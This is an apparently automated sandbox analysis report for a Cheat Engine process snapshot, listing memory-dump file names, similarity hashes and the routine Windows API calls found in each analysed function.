                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3852720340-0
                                                                                                                                                                                                                                      • Opcode ID: 53b3848c6b998e51a9fdb671a8295d41a5bcb9f69a7e0922d3ac22b6735b0273
                                                                                                                                                                                                                                      • Instruction ID: e207b2b98be06f9ff77bfd8136b11bf86f65762492dd39218fa1a1e2b172c1b0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 53b3848c6b998e51a9fdb671a8295d41a5bcb9f69a7e0922d3ac22b6735b0273
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8D01D4B261C7116EEB3C1AB75EC5A5637A4EB3377D320063AE320951D0EF9D88218555
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetRectEmpty.USER32(?), ref: 6B4F1A1E
                                                                                                                                                                                                                                      • RedrawWindow.USER32(?,?,00000000,00000105), ref: 6B4F1A33
                                                                                                                                                                                                                                      • IsRectEmpty.USER32(?), ref: 6B4F1A8B
                                                                                                                                                                                                                                      • RedrawWindow.USER32(?,?,00000000,00000105), ref: 6B4F1AB7
                                                                                                                                                                                                                                        • Part of subcall function 6B4F1ACE: RedrawWindow.USER32(00000000,?,00000000,00000105), ref: 6B4F1B42
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: RedrawWindow$EmptyRect
                                                                                                                                                                                                                                      • String ID: 0#Lk
                                                                                                                                                                                                                                      • API String ID: 138230908-1841850333
                                                                                                                                                                                                                                      • Opcode ID: 07347cd6a2e540486edcbb4e2c4263d707240e0a93cbd90ac44ed099da0541f1
                                                                                                                                                                                                                                      • Instruction ID: ce9b818c784156fe6bf3ae5efccae491adfc7f3b03f7dbcb32f660f61cec6cd2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 07347cd6a2e540486edcbb4e2c4263d707240e0a93cbd90ac44ed099da0541f1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F4415EB1E006259BCF05DFA5C884FEEB7B9EF49704F144069ED05AB250C779AA46CFA0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 6B4E098A
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 6B4E0995
                                                                                                                                                                                                                                      • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000002), ref: 6B4E09A8
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 6B4E09CF
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CurrentProcess$DuplicateErrorHandleLast
                                                                                                                                                                                                                                      • String ID: 0#Lk
                                                                                                                                                                                                                                      • API String ID: 3907606552-1841850333
                                                                                                                                                                                                                                      • Opcode ID: 7042c26f13a8b9d7cdff6a56ce9ebc6edc2786349ccc3fd2857e25d877f944e7
                                                                                                                                                                                                                                      • Instruction ID: 3f900b80ec02cc22f0bd096abaaccdf2b418ae5230f7cf4ce1c53a89accd80dd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7042c26f13a8b9d7cdff6a56ce9ebc6edc2786349ccc3fd2857e25d877f944e7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 49115135A00204ABDB109FB6C889E9EBBB8FB45711F044569E915DB341DB78EC01CBA0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,6B605AC3,00000000,?,00000001,00000000,?,6B605B3A,00000001,FlsFree,6B66750C,FlsFree,00000000), ref: 6B605A92
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                                      • String ID: api-ms-
                                                                                                                                                                                                                                      • API String ID: 3664257935-2084034818
                                                                                                                                                                                                                                      • Opcode ID: a64d112c6c19c0c614a45276860d5d9b96bdbd65db2c8038a5c02a6cd0bcdd67
                                                                                                                                                                                                                                      • Instruction ID: 76e9b92607183c4ccbba905da1f614cf66bcf371d6d97adabcc91261c012ec49
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a64d112c6c19c0c614a45276860d5d9b96bdbd65db2c8038a5c02a6cd0bcdd67
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1711E972E45625AFDF269A6E8DC479E37A49F06BB0F100152FE10EB290DB78ED0097D1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(Advapi32.dll,?,00000000,?,?,6B4DE4AA,?,00000000,A934EE1E,?,00000000,00000000,Function_0016966C,000000FF,?,6B4E44A3), ref: 6B4D2B09
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedW), ref: 6B4D2B19
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                      • String ID: 0#Lk$Advapi32.dll$RegDeleteKeyTransactedW
                                                                                                                                                                                                                                      • API String ID: 1646373207-534185125
                                                                                                                                                                                                                                      • Opcode ID: 71cbf3b6c8e1086d739059546fb68deac11e74067db2d18edc3315564040d498
                                                                                                                                                                                                                                      • Instruction ID: 111a2819814ce0ce6a3f1de73cc271950a1cffefd7c4101a64f234c2ebc10dac
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 71cbf3b6c8e1086d739059546fb68deac11e74067db2d18edc3315564040d498
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BAF0B473200509AFEF102E99DCE4CABBB9DEB852A9310817EF750C2220CE75CC029B70
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?), ref: 6B4E4A17
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetFileAttributesTransactedW), ref: 6B4E4A27
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                      • String ID: 0#Lk$GetFileAttributesTransactedW$kernel32.dll
                                                                                                                                                                                                                                      • API String ID: 1646373207-2862805169
                                                                                                                                                                                                                                      • Opcode ID: 04c76d978ead7eb6e35606ec49fc7e16fdfd20d7828d6165b7e34c5a2965f074
                                                                                                                                                                                                                                      • Instruction ID: 2459cbb1c1efea382b336d820282d1a64b9096e25bea9c7ffd5003db8a038931
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 04c76d978ead7eb6e35606ec49fc7e16fdfd20d7828d6165b7e34c5a2965f074
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0DF09032105205DFEF216ED69D54FAA77D8FB042A7F00646AF62196260C77DC851CBB4
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6B4D4ACF: __EH_prolog3.LIBCMT ref: 6B4D4AD6
                                                                                                                                                                                                                                        • Part of subcall function 6B4D4ACF: GetDC.USER32(00000000), ref: 6B4D4B02
                                                                                                                                                                                                                                      • IsRectEmpty.USER32(?), ref: 6B4F59C8
                                                                                                                                                                                                                                      • InvertRect.USER32(?,?), ref: 6B4F59D6
                                                                                                                                                                                                                                      • SetRectEmpty.USER32(?), ref: 6B4F59E8
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,6B4F3CD7), ref: 6B4F5A05
                                                                                                                                                                                                                                      • InvertRect.USER32(?,?), ref: 6B4F5A55
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Rect$EmptyInvert$ClientH_prolog3
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1656078942-0
                                                                                                                                                                                                                                      • Opcode ID: 3036f29232651c28f2ce25788c49460ef2f9e91af9d0783be9fa8326f5bfb83d
                                                                                                                                                                                                                                      • Instruction ID: b83af88d00d0703882f5dcbcebecadfa11a794339df05398df0734c53cb82d49
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3036f29232651c28f2ce25788c49460ef2f9e91af9d0783be9fa8326f5bfb83d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 02214F71A006099FCB15DFB5C885EEEBBF9EF49304F10406EE505E7210E775AA46CB60
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 6B4DEA68
                                                                                                                                                                                                                                      • SetTimer.USER32(00000000,?,00000000,6B4DDEFF), ref: 6B4DEB02
                                                                                                                                                                                                                                        • Part of subcall function 6B4D9057: GetModuleHandleW.KERNEL32(shell32.dll,00000000,?,6B4DEA91,6B665AB4,00000000,00000000,6B4E2319,00000008,00000000,?,?,6B4DDC1B,00000000,00000001,?), ref: 6B4D9069
                                                                                                                                                                                                                                        • Part of subcall function 6B4D9057: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6B4D9079
                                                                                                                                                                                                                                        • Part of subcall function 6B4D9057: EncodePointer.KERNEL32(00000000,?,6B4DEA91,6B665AB4,00000000,00000000,6B4E2319,00000008,00000000,?,?,6B4DDC1B,00000000,00000001,?,?), ref: 6B4D9082
                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(?), ref: 6B4DEAD3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressEncodeFreeH_prolog3HandleModulePointerProcTaskTimer
                                                                                                                                                                                                                                      • String ID: 0#Lk
                                                                                                                                                                                                                                      • API String ID: 2745541394-1841850333
                                                                                                                                                                                                                                      • Opcode ID: c880a58c44fd1661597a76855f6e719735c4af83d1508e207dfff46fd4c0fc2d
                                                                                                                                                                                                                                      • Instruction ID: 9f78225ee61c92617d33f3cc97925b89fe5b68dd57f18058f30172351e1f11ac
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c880a58c44fd1661597a76855f6e719735c4af83d1508e207dfff46fd4c0fc2d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F7312074700206ABCF18DB64CC55FBEF7A4FF48760F00412DE52AA7290DB39A900CBA1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetMessageW.USER32(00000030,00000000,00000000,00000000), ref: 6B4D18FA
                                                                                                                                                                                                                                      • TranslateMessage.USER32(00000030), ref: 6B4D1919
                                                                                                                                                                                                                                      • DispatchMessageW.USER32(00000030), ref: 6B4D1920
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Message$DispatchTranslate
                                                                                                                                                                                                                                      • String ID: 0#Lk
                                                                                                                                                                                                                                      • API String ID: 1706434739-1841850333
                                                                                                                                                                                                                                      • Opcode ID: 65f090c53dd733656b183b58a88e63c242e621bc27283fa2a0ea54dcf7926093
                                                                                                                                                                                                                                      • Instruction ID: 901d85a6adff11edf2e870cc6196729c080f28c40a23827c0aeac6b0280a886f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 65f090c53dd733656b183b58a88e63c242e621bc27283fa2a0ea54dcf7926093
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A2F044327018315BDB526B759864FBF776DEF8626534510A9EC01D3210EB2CD902C7E2
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 6B4D9822
                                                                                                                                                                                                                                      • GetClassNameW.USER32(?,?,0000000A), ref: 6B4D9837
                                                                                                                                                                                                                                      • CompareStringW.KERNEL32(0000007F,00000001,?,000000FF,combobox,000000FF,?,6B4C944D,?,?), ref: 6B4D984E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ClassCompareLongNameStringWindow
                                                                                                                                                                                                                                      • String ID: combobox
                                                                                                                                                                                                                                      • API String ID: 1414938635-2240613097
                                                                                                                                                                                                                                      • Opcode ID: fc4aac4c9ff1bf4b840adaaf8e0602f5246aced3f640da8d6085b5805f7768ff
                                                                                                                                                                                                                                      • Instruction ID: d16d4b4f2d07ceb2c1e4db26a5904266d22a365a6738436ef115986d558e7394
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fc4aac4c9ff1bf4b840adaaf8e0602f5246aced3f640da8d6085b5805f7768ff
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 98F0F431664119BBCF40EF688D06EEE77A89B17B20F000325F521E71C1CA64D50187A4
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetObjectW.GDI32(?,00000018,?), ref: 6B4EA922
                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 6B4EA9EC
                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 6B4EA9F5
                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 6B4EAA04
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Object$Delete
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 774837909-0
                                                                                                                                                                                                                                      • Opcode ID: a31ba89f3dcef83845c18bef080fe132887bbcf27903362ddfa5f01c94f077de
                                                                                                                                                                                                                                      • Instruction ID: 19ad7d64942eea6eb461499b37dbe02ac9908d848855d64fb5ecc9437e04508a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a31ba89f3dcef83845c18bef080fe132887bbcf27903362ddfa5f01c94f077de
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E418D31E4420ADBDF10DEA4C881FDEB7B5BF44706F118965E810A7280D77CC986CBA0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: H_prolog3$BeginCreatePaint
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3507124140-0
